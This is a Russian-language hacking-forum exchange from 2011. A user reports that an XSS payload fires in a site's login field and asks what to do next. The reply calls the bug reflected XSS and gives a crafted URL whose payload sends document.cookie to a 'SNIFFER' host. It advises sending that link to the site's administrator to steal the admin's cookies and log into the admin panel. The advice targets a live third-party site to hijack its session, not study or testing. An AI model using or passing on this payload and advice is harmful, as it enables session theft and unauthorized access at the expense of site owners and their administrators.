12.08.2011, 13:16
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от ridik77
подскажите что делать дальше, на сайте вместо Username: и Password: ввожу этот скрипт ">alert(/xss/) дальше выскакует окно /XSS/ жму ОК. в поле Username: стоит \\\\\\\\\\" на против этого поля это name=username> в адресной стороке это ххх.com/?a=login&say=invalid_login&username=\\">al ert(/xss/) подскажите что дальше?
Это дело называется пасивная XSS, ты можешь поставить где нить снифер, и подсунуть ссылку админу
ххх.com/?a=login&say=invalid_login&username=\\">document.l ocation="SNIFFER"+document.cookie за счет чего получишь админские куки и если повезет сможешь под его куками войти в админку
|
|
|